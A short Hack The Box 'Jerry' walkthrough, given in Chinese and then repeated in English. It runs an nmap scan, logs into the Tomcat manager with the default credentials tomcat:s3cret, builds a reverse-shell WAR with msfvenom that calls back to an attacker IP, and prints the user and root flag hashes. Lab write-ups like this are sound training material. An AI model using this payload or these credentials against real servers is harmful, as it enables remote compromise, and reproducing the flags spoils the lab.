htb jerry

Information Gathering

# Nmap 7.98 scan initiated Sat Dec 27 06:19:34 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.12s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2008|7 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (97%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.008 days (since Sat Dec 27 06:09:14 2025)
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 06:20:16 2025 -- 1 IP address (1 host up) scanned in 41.97 seconds

默认凭据tomcat:s3cret登陆上应用管理器

上传WAR文件即可获取shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f war -o shell.war

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,418,716,672 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e

htb jerry

Information Gathering

# Nmap 7.98 scan initiated on Saturday, December 27, 2025, at 06:19:34, using the following command:  
# /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.95  
Nmap scan report for 10.10.10.95:  
The host is online (latency: 0.12 seconds).  
999 TCP ports were not displayed (no response).  

PORT     STATE      SERVICE      VERSION  
8080/tcp     OPEN       http        Apache Tomcat/Coyote JSP engine 1.1  
| HTTP methods:  
|   Supported methods: GET, HEAD, POST, OPTIONS  
|   HTTP server header: Apache-Coyote/1.1  
|   HTTP favicon: Apache Tomcat  
|   HTTP title: Apache Tomcat/7.0.88  

Warning: The OSScan results may be unreliable because at least one open port and one closed port could not be detected.  
Device type: General purpose.  
 guessed operating system: Microsoft Windows 2012|2008|7 (97% probability).  
OS classification (CPE):  
cpe:/o:microsoft:windows_server_2012:r2,  
             cpe:/o:microsoft:windows_server_2008:r2,  
             cpe:/o:microsoft:windows_7  

Possible operating systems:  
Microsoft Windows Server 2012 R2 (97%),  
             Microsoft Windows 7,  
             Windows Server 2008 R2 (both 91%).  
No exact operating system match was found (test conditions were not ideal).  
Uptime estimate: 0.008 days (since Saturday, December 27, 2025, 06:09:14).  
TCP sequence prediction difficulty: 259 (difficult!).  
IP ID sequence generation: Incremental.  

Data files are read from: /usr/share/nmap.  
OS and service detection has been completed. Please report any incorrect results at:  
https://nmap.org/submit/

# Nmap completed on Saturday, December 27, 2025, at 06:20:16 – 1 IP address (1 host up) was scanned in 41.97 seconds.
The application manager was accessed using the default credentials `tomcat:s3cret`.
Simply upload the WAR file to obtain the shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f war -o shell.war

C:\Users\Administrator\Desktop\flags>dir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04

Directory of C:\Users\Administrator\Desktop\flags:

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,418,716,672 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e